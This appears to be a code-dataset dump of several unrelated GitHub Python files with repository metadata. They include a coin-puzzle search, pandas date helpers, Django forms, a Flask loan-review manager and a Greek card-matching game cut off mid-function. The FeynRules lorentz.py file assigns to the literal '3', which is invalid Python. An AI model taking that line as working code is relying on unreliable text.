ball_df = input_file.ball
player_dfs = [p.data for p in input_file.players]
hits = input_file.hits
passes = list(filter(lambda k: k[1].analytics['pass_'], hits.items()))
print(passes)
for p in passes:
p = p[1]
length = p.next_hit.frame_number - p.frame_number
self.hit_lengths.append(length)
# train on hits
def finish(self):
plt.hist(self.hit_lengths, bins=50)
plt.show()
if __name__ == '__main__':
input_formatter = LegacyNormalizerInputFormatter(LegacyInputFormatter())
output_formatter = HostOutputFormatter(AutoencoderOutputFormatter(input_formatter))
pl = PassLengthTrainer(AutoencoderModelHolder(AutoencoderModel(compressed_dim=50),
input_formatter, output_formatter))
# pl.train_on_files(500)
pl.train_on_file(name='3E38E50B44101E81F91C40ABC99CA0AB')
| UTF-8 | Python | false | false | 1,826 | py | 60 | pass_length.py | 55 | 0.700986 | 0.680175 | 0 | 42 | 42.47619 | 92 |
Sheriff-AA/7COM1034-AI | 6,983,616,872,766 | 62ef0f0ec6c2d8443ad763e0b307a3e80e560de4 | fd4de865ac652b6b1760a471b690fe7103a3572e | /six_coins.py | 3f53f329e9fe8e0541acb6a058896b9499c38822 | [] | no_license | https://github.com/Sheriff-AA/7COM1034-AI | 17d9e93b96d7ec3ecf4ab9ac69bb2a3424a80832 | c47e5264fd2e340f7cb90417f4a8dc7ec55647bf | refs/heads/master | "2023-04-05T00:53:35.980077" | "2021-04-09T09:18:38" | "2021-04-09T09:18:38" | 355,812,821 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | start_node = ["LC", "LC", "LC", "E", "RC", "RC", "RC"]
goal_node = ["RC", "RC", "RC", "E", "LC", "LC", "LC"]
def cleanup(nodes):
# in-place!!
# remove dummy entries from begin and end of list
# clean from the front
while not nodes[0]:
nodes.pop(0)
while not nodes[-1]:
nodes.pop()
node_d = [1, 2, 1, 2, 1, 2]
def goal(nodes):
return nodes == [1, 1, 1, 2, 2, 2] or nodes == [2, 2, 2, 1, 1, 1]
def successor(node):
for i in range(len(node) - 1): # stop at second last
# always move two adjacent coins to the right
if not node[i] or not node[i + 1]:
# if one of them empty, try other move
continue
# try all moves
for target in range(i + 1, len(node) + 1):
# print "move from", i, "to", target
new_node = node[:] # copy
doublet = new_node[i:i + 2]
new_node[i:i + 2] = [0, 0] # empty them
new_node.extend([0, 0]) # buffer at the end
if new_node[target:target + 2] == [0, 0]:
# target area empty
new_node[target:target + 2] = doublet
cleanup(new_node) # in-place!!
if new_node == node:
continue
# print "Successor:", node, new_node
yield new_node
def breadth_first_search(paths):
if not paths:
return
candidate = paths.pop(0)
current_state = candidate[-1]
if goal(current_state):
return candidate
for succ in successor(current_state):
paths.append(candidate + [succ])
return breadth_first_search(paths)
for sol in breadth_first_search([[node_d]]):
print(sol)
| UTF-8 | Python | false | false | 1,715 | py | 13 | six_coins.py | 13 | 0.516618 | 0.495044 | 0 | 61 | 27.114754 | 69 |
jcallem94/feynrules | 6,562,710,056,276 | cf4db54c709ce2b6fb4e8aa40408d78f39902136 | 99b11ee9f6c707361fe9b5d6bd59d3ac4ff52ceb | /Models/EffLRSMnlo_FilesWithUFO/EffLRSM_NLO/lorentz.py | 8435254c77f66cbd416faff258653fde1752bd15 | [] | no_license | https://github.com/jcallem94/feynrules | 6d53a48570eb3de5ab67c12804ba6e21cbe2d76c | 3e7bd7721b5e202ab87dc9cb9f34711a7e2c0bde | refs/heads/master | "2021-01-21T12:00:28.173918" | "2017-08-31T19:27:04" | "2017-08-31T19:27:04" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # This file was automatically created by FeynRules 2.3.29
# Mathematica version: 10.0 for Linux x86 (64-bit) (September 9, 2014)
# Date: Fri 25 Aug 2017 23:44:54
from object_library import all_lorentz, Lorentz
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
try:
import form_factors as ForFac
except ImportError:
pass
3 = Lorentz(name = '3',
spins = [],
structure = '1')
| UTF-8 | Python | false | false | 441 | py | 9 | lorentz.py | 7 | 0.675737 | 0.605442 | 0 | 17 | 24.882353 | 80 |
syurskyi/Python_Topics | 4,879,082,885,662 | 0cadc9640709c0c2dd78d9014603c391ed1cf5fa | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /045_functions/009_functools_module/examples/13-chain.py | d7e02c6a1ee13cce91b500f4c51f840784da80d8 | [] | no_license | https://github.com/syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | "2023-06-08T19:29:16.214395" | "2023-05-29T17:09:11" | "2023-05-29T17:09:11" | 220,583,118 | 3 | 2 | null | false | "2023-02-16T03:08:10" | "2019-11-09T02:58:47" | "2022-11-03T01:22:28" | "2023-02-16T03:08:09" | 198,671 | 2 | 2 | 33 | Python | false | false | """Пример использования функции chain модуля itertools"""
from itertools import chain
for i in chain(range(2), range(3)):
print(i)
| UTF-8 | Python | false | false | 172 | py | 15,362 | 13-chain.py | 14,734 | 0.717391 | 0.702899 | 0 | 6 | 22 | 58 |
dryabokon/tools | 240,518,200,943 | b137b7db25668d07f9aabbbf6016f63eb960d044 | ab7ca74289b3e3cfa57480e996a297b9c08ae5db | /tools_time_convertor.py | 6d6477fa5c29e60c6935b398ee3961d306a3c2bb | [] | no_license | https://github.com/dryabokon/tools | b4706d9a7dc74376a60a5927ac9e481b20f454a5 | a9964fd24f7e05377cb44696cf1043c34d5e4147 | refs/heads/master | "2023-08-09T07:15:31.721628" | "2023-08-07T11:23:50" | "2023-08-07T11:23:50" | 168,508,474 | 1 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
# ----------------------------------------------------------------------------------------------------------------------
def now_str(format='%Y-%m-%d'):
dt = datetime_to_str(pd.Timestamp.now(),format)
return dt
# ----------------------------------------------------------------------------------------------------------------------
def str_to_datetime(str_series,format='%Y-%m-%d',errors='ignore'):
res = pd.to_datetime(str_series, format=format, errors=errors)
return res
# ----------------------------------------------------------------------------------------------------------------------
def datetime_to_str(dt,format='%Y-%m-%d'):
if isinstance(dt, (pd.Series)):
res = pd.Series(pd.DatetimeIndex(dt).strftime(format))
else:
res = dt.strftime(format)
return res
# ----------------------------------------------------------------------------------------------------------------------
def add_delta(str_value,str_delta,format='%Y-%m-%d'):
if isinstance(str_value,str):
str_value = pd.Series([str_value])
res = datetime_to_str(pd.to_datetime(str_value,format=format,errors='ignore').values[0] + pd.Timedelta(str_delta), format)
else:
res = pd.to_datetime(str_value, format=format, errors='ignore') + pd.Timedelta(str_delta)
return res
# ----------------------------------------------------------------------------------------------------------------------
def generate_date_range(dt_start,dt_stop,freq):
need_postprocess_to_str = False
if isinstance(dt_start,str):
dt_start = str_to_datetime(dt_start)
need_postprocess_to_str = True
if freq[0] in ['0','1','2','3','4','5','6','7','9']:
delta = freq
else:
delta = '1'+freq
dates = []
now = dt_stop if not isinstance(dt_stop,str) else str_to_datetime(dt_stop)
while now>=(dt_start if not isinstance(dt_start,str) else str_to_datetime(dt_start)):
dates.append(now)
now= now - pd.Timedelta(delta)
dates = dates[::-1]
if need_postprocess_to_str:
dates = datetime_to_str(pd.Series(dates))
return dates
# ----------------------------------------------------------------------------------------------------------------------
def pretify_timedelta(td):
res = []
for s in td:
hours, remainder = divmod(s, 3600)
minutes, seconds = divmod(remainder, 60)
msec = s%1
res.append('%02d:%02d:%02d:%03d' % (hours, minutes, seconds,1000*msec))
#res = ['%02d:%02d:%02d:%03d' % (0, (x - x % 1) / 60, (x - x % 1) % 60, 100 * (x % 1)) for x in ts]
return res
# ----------------------------------------------------------------------------------------------------------------------
| UTF-8 | Python | false | false | 2,765 | py | 112 | tools_time_convertor.py | 111 | 0.419168 | 0.400723 | 0 | 65 | 41.538462 | 130 |
slukas111/custom_user | 10,325,101,413,038 | a5a6609077c1210bcdbe829d2641e8c409a4afab | b34cef759d791dce0331b85c9582703b2e099e73 | /sashauser/forms.py | a48e4626d40380fa1b1a870fd464e9fcdd945045 | [] | no_license | https://github.com/slukas111/custom_user | 9a552c4df416799b2acaa7fd6583d6208baff578 | 30d4a6e01f93ba12600631ed99b1df1296aa5d75 | refs/heads/master | "2023-07-31T12:36:56.389065" | "2020-07-03T22:17:12" | "2020-07-03T22:17:12" | 268,570,838 | 0 | 0 | null | false | "2021-09-22T19:08:25" | "2020-06-01T16:13:21" | "2020-07-03T22:17:24" | "2021-09-22T19:08:23" | 11 | 0 | 0 | 1 | Python | false | false | from django import forms
from .models import CustomUser
class LoginForm(forms.Form):
username = forms.CharField(max_length=50)
password = forms.CharField(max_length=32, widget=forms.PasswordInput)
class SignUpForm(forms.Form):
username = forms.CharField(max_length=50)
display_name = forms.CharField(max_length=50)
password = forms.CharField(max_length=32, widget=forms.PasswordInput) | UTF-8 | Python | false | false | 407 | py | 4 | forms.py | 3 | 0.761671 | 0.737101 | 0 | 12 | 33 | 73 |
leolinf/flask-demo | 6,554,120,094,269 | 559a625e5bc545070efb1f7e1839880307ff65ca | b1e909985a022e925347200c7e62c56e85ec3325 | /risk/app/review/managers.py | b58cacdfa962d8c380f9e9ed64bbcaad00f946f0 | [] | no_license | https://github.com/leolinf/flask-demo | 221d4b1a4b834b148ebc8d8ef698e38b7dd86b06 | c882d5bf2f7a337c08a9d60b5062324e512c0a3c | refs/heads/master | "2022-12-09T18:51:16.477097" | "2019-03-25T10:27:00" | "2019-03-25T10:27:00" | 118,107,203 | 1 | 0 | null | false | "2022-12-08T00:46:14" | "2018-01-19T09:46:31" | "2019-03-25T10:27:13" | "2022-12-08T00:46:13" | 618 | 1 | 0 | 26 | Python | false | false | # -*- coding: utf-8 -*-
import datetime
from ..models import InputApply
from ..constants import ApproveStatus, Code, ViewStatus, ViewLogTemp, InputApplyStatus, Status, LocalState
from ..config import Config
from ..databases import session_scope
import json
from ..models.sqlas import ReviewLog
from app.credit.utils import check_whether_self
class ReviewManager(object):
def __init__(self, session, *args, **kwargs):
self.session = session
self.now = datetime.datetime.now()
self.review_instance = None
def _get_status_after_review(self, previous_status, steps, is_pass=False):
"""获取审批之后的状态"""
if steps == 1 and previous_status in [ApproveStatus.FIRST_DOING, None]:
status = ApproveStatus.SECOND_DOING
elif steps == 2 and previous_status == ApproveStatus.SECOND_DOING:
status = ApproveStatus.THIRD_DOING
elif steps == 3 and previous_status == ApproveStatus.THIRD_DOING:
status = ApproveStatus.PASS if is_pass else ApproveStatus.DENY
else:
status = previous_status
return status
def _get_status_after_locked(self, previous_status):
"""获取锁了之后的状态"""
if previous_status in [ApproveStatus.WAITING, None]:
status = ApproveStatus.FIRST_DOING
elif previous_status == ApproveStatus.FIRST_DONE:
status = ApproveStatus.SECOND_DOING
elif previous_status == ApproveStatus.SECOND_DONE:
status = ApproveStatus.THIRD_DOING
else:
status = previous_status
return status
def _record_view(self, review, steps, params, prestatus):
"""添加日志"""
# 保存新的状态
new_status = review.approve_status
review.approve_status = prestatus
operate_json = json.dumps(params)
if steps == ViewStatus.VIEW_FIRST:
review.first_view = operate_json
elif steps == ViewStatus.VIEW_SECOND:
review.second_view = operate_json
elif steps == ViewStatus.VIEW_THIRD:
review.third_view = operate_json
tem_num = self.review_log_get_template_status(review, steps, params.get("isFinalPass", None))
review.approve_status = new_status
if tem_num == -3 or tem_num == -2:
review.third_view = ""
current_user = review.lock_user
if tem_num == -2:
view_log_obj = ReviewLog(
params="",
user_id=current_user.id,
# username=current_user.username,
create_time=self.now,
input_apply_id=review.id,
template_number=7
)
elif tem_num == -3:
view_log_obj = ReviewLog(
params="",
user_id=current_user.id,
# username=current_user.username,
create_time=self.now,
input_apply_id=review.id,
template_number=5
)
else:
view_log_obj = ReviewLog(
params=operate_json,
user_id=current_user.id,
# username=current_user.username,
create_time=self.now,
input_apply_id=review.id,
template_number=tem_num
)
if steps != 3:
# with session_scope(self.session) as session:
# session.add(review)
self.session.add(view_log_obj)
else:
# self.session.add(review)
self.session.add(view_log_obj)
def check_is_locked(self, search_id, current_user):
"""给前端用的判断有没有锁"""
now = self.now
review = self.session.query(InputApply).get(search_id)
if not review:
return Code.SEARCH_NOT_EXIST
if review.local_state == LocalState.WEB:
lock = 1
timeout = 0
username = ''
elif review.is_locked and review.lock_user_id == current_user.id:
lock = 0
username = current_user.username
timeout = 0
elif review.is_locked and review.lock_user_id != current_user.id:
lock = 1
timeout = 0
username = review.lock_user.username
elif not review.is_locked and review.lock_user_id == current_user.id and review.lock_time + datetime.timedelta(seconds=Config.LOCK_TIME) < now:
lock = 0
timeout = 1
username = current_user.username
elif not review.is_locked and review.lock_user_id == current_user.id and review.lock_time + datetime.timedelta(seconds=Config.LOCK_TIME) >= now:
lock = 0
timeout = 0
username = current_user.username
elif not review.is_locked and review.lock_user_id and review.lock_user_id != current_user.id:
lock = 0
timeout = 1
username = review.lock_user.username
else:
lock = 0
timeout = 0
username = ''
res = {
'isBlocked': lock,
'isTimeout': timeout,
'status': review.approve_status,
'username': username,
}
return res
def add_lock(self, search_id, current_user):
"""加锁"""
now = self.now
credit = self.session.query(InputApply).get(search_id)
if not credit:
return Code.SEARCH_NOT_EXIST
if not check_whether_self(credit):
return Code.NOT_ALLOWED
if credit.local_state == LocalState.WEB:
return Code.NOT_ALLOWED
next_status = self._get_status_after_locked(credit.approve_status)
if not credit.is_locked or credit.lock_user_id == current_user.id:
with session_scope(self.session) as session:
credit.is_locked = 1
credit.lock_time = now
credit.lock_user_id = current_user.id
credit.approve_status = next_status
session.add(credit)
return Code.SUCCESS
else:
return Code.UNABLE_LOCK
def review(self, search_id, current_user, steps, params, is_pass=None):
"""
审批
:param steps: 审批步骤 1/2/3
"""
now = self.now
input_apply = self.session.query(InputApply).get(search_id)
if not input_apply:
return Code.SEARCH_NOT_EXIST
if not check_whether_self(input_apply):
return Code.NOT_ALLOWED
if input_apply.local_state == 2:
return Code.NOT_ALLOWED
review = input_apply
# 被别人锁了
if review.is_locked and review.lock_user_id != current_user.id:
return Code.ALREADY_LOCKED
# 没有被锁
elif not review.is_locked:
return Code.NOT_LOCKED
previous_status = review.approve_status
next_status = self._get_status_after_review(previous_status, steps, is_pass)
if steps == 3:
review.is_locked = 0
else:
review.is_locked = 1
review.lock_time = now
review.lock_user_id = current_user.id
review.approve_status = next_status
review.approve_time = now
review.approve_status = next_status
review.approve_time = now
self._record_view(review, steps, params, previous_status)
if next_status == ApproveStatus.DENY:
review.status = Status.APPROVEDENIED
review.content = params.get("msg", "")
if next_status == ApproveStatus.PASS:
review.status = Status.WAITMERCH
review.content = params.get("msg", "")
self.session.add(review)
self.review_instance = review
return Code.SUCCESS, next_status
def review_log_get_template_status(self, sea_obj, stage, pass__=None):
ret = -1 # 表示最终的状态没有变
if stage == ViewStatus.VIEW_BACK:
if sea_obj.third_view:
if json.loads(sea_obj.third_view).get('isFinalPass') == 1:
return -2
else:
return -3
elif stage == ViewStatus.VIEW_FIRST:
if sea_obj.approve_status == ApproveStatus.FIRST_DOING:
ret = 1 # 未初审 到 初审
elif stage == ViewStatus.VIEW_SECOND:
if sea_obj.approve_status == ApproveStatus.SECOND_DOING:
ret = 2 # 已初审到 已复审
elif stage == ViewStatus.VIEW_THIRD:
if pass__ == 1 or pass__ == '1':
if sea_obj.approve_status == ApproveStatus.THIRD_DOING:
ret = 3
else:
if sea_obj.approve_status == ApproveStatus.THIRD_DOING:
ret = 4
return ret
@staticmethod
def get_status_after_unlock(previous_status):
"""获取解锁后的状态"""
if previous_status == ApproveStatus.FIRST_DOING:
status = ApproveStatus.WAITING
elif previous_status == ApproveStatus.SECOND_DOING:
status = ApproveStatus.FIRST_DONE
elif previous_status == ApproveStatus.THIRD_DOING:
status = ApproveStatus.SECOND_DONE
else:
status = previous_status
return status
| UTF-8 | Python | false | false | 9,369 | py | 212 | managers.py | 183 | 0.564981 | 0.560305 | 0 | 277 | 32.194946 | 152 |
TeoTse/Python-Scripts | 446,676,627,133 | a5c25be1d5e56e837ca70478635891a1529aae52 | a34489d2bd41e19ecd6ef158d283c9d8720de3ed | /Game/MatchingGame.py | 19b54fad3efa5aee6b0162f00725e27146573492 | [] | no_license | https://github.com/TeoTse/Python-Scripts | b7fd64d69b181da14647784b62267928b0f02566 | c18de8f57dee1db6100877d28e17ff12ba72c329 | refs/heads/main | "2023-04-08T05:33:34.440286" | "2021-04-04T20:56:03" | "2021-04-04T20:56:03" | 354,644,371 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import random
#Function that creates all the cards of the game depending on the level the user enters
def CardSet(n,AllCards):
symbols = ["♥","♦","♠","♣"]
if(n == 16): #Easy level contains 16 cards
values = ['10', 'J', 'Q', 'K']
for symbol in symbols:
for value in values:
AllCards.append(Card(symbol,10,value+symbol,False))
if(n == 40): #Medium level contains 40 cards
values = ['A','2', '3', '4', '5', '6', '7', '8', '9', '10']
for symbol in symbols:
for value in values:
if(value == "A"):
AllCards.append(Card(symbol,1,value+symbol,False))
if(value != "A"):
AllCards.append(Card(symbol,int(value),value+symbol,False))
if(n == 52):#Hard level contains 52 cards
values = ['A','2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']
for symbol in symbols:
for value in values:
if(value == "J" or value == "Q" or value == "K"):
AllCards.append(Card(symbol,10,value+symbol,False))
elif(value == "A"):
AllCards.append(Card(symbol,1,value+symbol,False))
else:
AllCards.append(Card(symbol,int(value),value+symbol,False))
#Function that sets all cards at either open or closed(Used to open and show all cards at the start of the game and then close them)
def SetStateAll(state,AllCards,n):
for i in range(n):
AllCards[i].SetStat(state)
#Function that sets up the graphic part easy difficulty
def Easy(AllCards):
print(" 1 2 3 4")
print("1 ",end = "")
for i in range(4):
if(AllCards[i].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i].GetDesc()," ",end= "")
print("")
print("")
print("2 ",end = "")
for i in range(4):
if(AllCards[i+4].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+4].GetDesc()," ",end= "")
print("")
print("")
print("3 ",end = "")
for i in range(4):
if(AllCards[i+8].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+8].GetDesc()," ",end= "")
print("")
print("")
print("4 ",end = "")
for i in range(4):
if(AllCards[i+12].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+12].GetDesc()," ",end= "")
print("")
print("")
#Function that sets up the graphic part medium difficulty
def Medium(AllCards):
print(" 1 2 3 4 5 6 7 8 9 10")
print("1 ",end = "")
for i in range(10):
if(AllCards[i].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i].GetDesc()," ",end= "")
print("")
print("")
print("2 ",end = "")
for i in range(10):
if(AllCards[i+10].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+10].GetDesc()," ",end= "")
print("")
print("")
print("3 ",end = "")
for i in range(10):
if(AllCards[i+20].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+20].GetDesc()," ",end= "")
print("")
print("")
print("4 ",end = "")
for i in range(10):
if(AllCards[i+30].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+30].GetDesc()," ",end= "")
print("")
print("")
#Function that sets up the graphic part hard difficulty
def Hard(AllCards):
print(" 1 2 3 4 5 6 7 8 9 10 11 12 13")
print("1 ",end = "")
for i in range(13):
if(AllCards[i].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i].GetDesc()," ",end= "")
print("")
print("")
print("2 ",end = "")
for i in range(13):
if(AllCards[i+13].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+13].GetDesc()," ",end= "")
print("")
print("")
print("3 ",end = "")
for i in range(13):
if(AllCards[i+26].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+26].GetDesc()," ",end= "")
print("")
print("")
print("4 ",end = "")
for i in range(13):
if(AllCards[i+39].GetStat() == False):
print("X ",end = "")
else:
print(AllCards[i+39].GetDesc()," ",end= "")
print("")
print("")
#Function called for the first card that player picks(Checks if card is already open and if it's a new one it is inserted in an array used to select only open cards)
def FirstCard(AllCards,Player,Level,CardsOpen):
flag = False
y = input("Παίκτη " + str(Player) + ": Δώσε γραμμή και στήλη πρώτης κάρτας (πχ 1 10):")
lenh = len(y)
flags = False
#Checking if card is entered correctly and if it's not yet opened(Returns False on fail)
for i in range (lenh):
if(y[i] != " "):
if(flag == False):
if(i+1>lenh):
return False
if(y[i+1]!=" "):
return False
num1 = int(y[i])
if(num1>4 or num1<1):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
flag = True
Cline1 = num1
else:
num1 = int(y[i])
if(Level == 1):
if(num1 == 1 and i+1 == lenh):
Crow1 = 1
elif(num1 <=4 and i+1 == lenh):
Crow1 = num1
else:
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(Level == 2):
if(i+2==lenh and num1 == 1 and y[i+1] != " "):
num2 = int(y[i+1])
if(num2 == 0):
Crow1 = 10
flags = True
else:
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(num1 >= 1 and num1 <= 9 and (i+1) == lenh):
Crow1 = num1
elif(flags == False):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(Level == 3):
if(i+2 == lenh and num1 == 1 and y[i+1] != " "):
num2 = int(y[i+1])
if(num2 < 4 and num2 >= 0):
Crow1 = 10 + num2
flags = True
else:
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(num1 >= 1 and num1 <= 9 and (i+1) == lenh and flags == False):
Crow1 = num1
elif(flags == False):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
#Cards are inserted into array to compare them later
if(Level == 1 and AllCards[(Cline1-1)*4 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*4 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*4 + Crow1-1)
return True
elif(Level == 2 and AllCards[(Cline1-1)*10 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*10 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*10 + Crow1-1)
return True
elif(Level == 3 and AllCards[(Cline1-1)*13 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*13 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*13 + Crow1-1)
return True
else:
print("Η κάρτα είναι ήδη ανοικτή, δοκιμάστε ξανά")
return False
#Function called for the second card that player picks(Checks if card is already open and if it's a new one it is inserted in an array used to select only open cards)
def SecondCard(AllCards,Player,Level,CardsOpen):
flag = False
y = input("Παίκτη " + str(Player) + ": Δώσε γραμμή και στήλη δεύτερης κάρτας (πχ 1 10):")
lenh = len(y)
flags = False
#Checking if card is entered correctly and if it's not yet opened(Returns True on success)
for i in range (lenh):
if(y[i] != " "):
if(flag == False):
if(i+1>lenh):
return False
if(y[i+1]!=" "):
return False
num1 = int(y[i])
if(num1>4 or num1<1):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
flag = True
Cline1 = num1
else:
num1 = int(y[i])
if(Level == 1):
if(num1 == 1 and i+1 == lenh):
Crow1 = 1
elif(num1 <=4 and i+1 == lenh):
Crow1 = num1
else:
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(Level == 2):
if(i+2==lenh and num1 == 1 and y[i+1] != " "):
num2 = int(y[i+1])
if(num2 == 0):
Crow1 = 10
flags = True
else:
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(num1 >= 1 and num1 <= 9 and (i+1) == lenh):
Crow1 = num1
elif(flags == False):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
elif(Level == 3):
if(i+2 == lenh and num1 == 1 and y[i+1] != " "):
num2 = int(y[i+1])
if(num2 < 4 and num2 >= 0):
Crow1 = 10 + num2
flags = True
elif(num1 >= 1 and num1 <= 9 and (i+1) == lenh and flags == False):
Crow1 = num1
elif(flags == False):
print("Λάθος στοιχεία επιλογής κάρτας")
return False
#Cards are inserted into array to compare them later
if(Level == 1 and AllCards[(Cline1-1)*4 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*4 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*4 + Crow1-1)
return True
elif(Level == 2 and AllCards[(Cline1-1)*10 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*10 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*10 + Crow1-1)
return True
elif(Level == 3 and AllCards[(Cline1-1)*13 + Crow1-1].GetStat() == False):
AllCards[(Cline1-1)*13 + Crow1-1].SetStat(True)
CardsOpen.append((Cline1-1)*13 + Crow1-1)
return True
else:
print("Η κάρτα είναι ήδη ανοικτή, δοκιμάστε ξανά")
return False
#Function called on every Turn so that each player can play
def Turn(AllCards,Player,Level,CardsOpen):
check = FirstCard(AllCards,Player,Level,CardsOpen)
#If first card is correct we can continue
if(check == True):
if(Level == 1):
Easy(AllCards)
elif(Level == 2):
Medium(AllCards)
else:
Hard(AllCards)
check2 = SecondCard(AllCards,Player,Level,CardsOpen)
#If second card is correct we can continue
while(check2 == False):
check2 = SecondCard(AllCards,Player,Level,CardsOpen)
if(Level == 1):
Easy(AllCards)
elif(Level == 2):
Medium(AllCards)
else:
Hard(AllCards)
return True
else:
return False
#Function that checks if game is over(If there is no open card returns True since game is over,otherwise returns False)
def CheckGame(AllCards):
x = len(AllCards)
for i in range (x):
if(AllCards[i].GetStat() == False):
return False
return True
#Function that prints the player that won the game(If 2 players have the same points it prints draw)
def GameWinner(PlayerPoints):
max = 0
maxs = -1
flag = False
for i in range (len(PlayerPoints)):
if(max < PlayerPoints[i]):
max = PlayerPoints[i]
maxs = i
flag = False
elif(max == PlayerPoints[i]):
flag = True
if(flag == False):
print("Νίκησε ο παίχτης " + str(maxs+1))
else:
print("Υπάρχει ισοβαθμία μεταξύ παιχτών")
#Main function that calls all functions and is terminated when game is over
def main():
#Checking player and level number to be eligible
print("Καλώς ήρθατε στο Matching Game")
flag = False
while (flag == False):
x = input("Δώστε αριθμό παιχτών:")
x = int(x)
if (x >= 2):
flag = True
else:
print("Δώστε έγκυρο αριθμό παιχτών (τουλάχιστον 2)")
flag2=False
while (flag2 == False):
y = input("Δώστε επίπεδο δυσκολίας Εύκολο (1), Μέτριο (2), Δύσκολο (3) :")
y = int(y)
if ((y == 1) or (y == 2) or (y == 3)):
flag2 = True
else:
print("Δώστε έγκυρο επίπεδο δυσκολίας")
#Initializiting arrays and using if condition to start game according to level
gamefinished = False
PlayerPoints = [0] * x
CardsOpen = []
Player = 1
if(y == 1):
#Showing cards and then dissapearing them
PlayerTurn = False
AllCards = []
CardSet(16,AllCards)
random.shuffle(AllCards)
SetStateAll(True,AllCards,16)
Easy(AllCards)
SetStateAll(False,AllCards,16)
Easy(AllCards)
#While game is still running
while(gamefinished == False):
check = False
while (check == False):
check = Turn(AllCards,Player,1,CardsOpen)
desc1 = AllCards[CardsOpen[0]].GetDesc()
desc2 = AllCards[CardsOpen[1]].GetDesc()
#If player found 2 same cards takes points otherwise everything closes again
if(desc1[0] == desc2[0]):
PlayerPoints[Player-1] += AllCards[CardsOpen[0]].GetValue()
print("Επιτυχές ταίριασμα +"+ str(AllCards[CardsOpen[0]].GetValue()) +" πόντοι! Παίκτη " + str(Player) + " έχεις συνολικά " + str(PlayerPoints[Player-1]) +" πόντους.")
#Special cards
if(desc1[0] == "J"):
PlayerTurn = True
elif(desc1[0] == "K"):
if(Player+1 > x):
Player = 1
else:
Player += 1
CardsOpen.clear()
else:
AllCards[CardsOpen[0]].SetStat(False)
AllCards[CardsOpen[1]].SetStat(False)
CardsOpen.clear()
if (Player+1 > x and PlayerTurn == False):
Player = 1
elif(PlayerTurn == False):
Player += 1
PlayerTurn = False
gamefinished = CheckGame(AllCards)
GameWinner(PlayerPoints)
elif(y == 2):
#Showing cards and then dissapearing them
PlayerTurn = False
AllCards = []
CardSet(40,AllCards)
random.shuffle(AllCards)
SetStateAll(True,AllCards,40)
Medium(AllCards)
SetStateAll(False,AllCards,40)
Medium(AllCards)
#While game is still running
while(gamefinished == False):
check = False
while (check == False):
check = Turn(AllCards,Player,2,CardsOpen)
desc1 = AllCards[CardsOpen[0]].GetDesc()
desc2 = AllCards[CardsOpen[1]].GetDesc()
#If player found 2 same cards takes points otherwise everything closes again
if(desc1[0] == desc2[0]):
PlayerPoints[Player-1] += AllCards[CardsOpen[0]].GetValue()
print("Επιτυχές ταίριασμα +"+ str(AllCards[CardsOpen[0]].GetValue()) +" πόντοι! Παίκτη " + str(Player) + " έχεις συνολικά " + str(PlayerPoints[Player-1]) +" πόντους.")
#Special cards
if(desc1[0] == "J"):
PlayerTurn = True
elif(desc1[0] == "K"):
if(Player+1 > x):
Player = 1
else:
Player += 1
CardsOpen.clear()
else:
AllCards[CardsOpen[0]].SetStat(False)
AllCards[CardsOpen[1]].SetStat(False)
CardsOpen.clear()
if (Player+1 > x and PlayerTurn == False):
Player = 1
elif(PlayerTurn == False):
Player += 1
PlayerTurn = False
gamefinished = CheckGame(AllCards)
GameWinner(PlayerPoints)
else:
#Showing cards and then dissapearing them
PlayerTurn = False
AllCards = []
CardSet(52,AllCards)
random.shuffle(AllCards)
SetStateAll(True,AllCards,52)
Hard(AllCards)
SetStateAll(False,AllCards,52)
Hard(AllCards)
#While game is still running
while(gamefinished == False):
check = False
while (check == False):
check = Turn(AllCards,Player,3,CardsOpen)
desc1 = AllCards[CardsOpen[0]].GetDesc()
desc2 = AllCards[CardsOpen[1]].GetDesc()
#If player found 2 same cards takes points otherwise everything closes again
if(desc1[0] == desc2[0]):
PlayerPoints[Player-1] += AllCards[CardsOpen[0]].GetValue()
print("Επιτυχές ταίριασμα +"+ str(AllCards[CardsOpen[0]].GetValue()) +" πόντοι! Παίκτη " + str(Player) + " έχεις συνολικά " + str(PlayerPoints[Player-1]) +" πόντους.")
#Special cards
if(desc1[0] == "J"):
PlayerTurn = True
elif(desc1[0] == "K"):
if(Player+1 > x):
Player = 1
else:
Player += 1
CardsOpen.clear()
else:
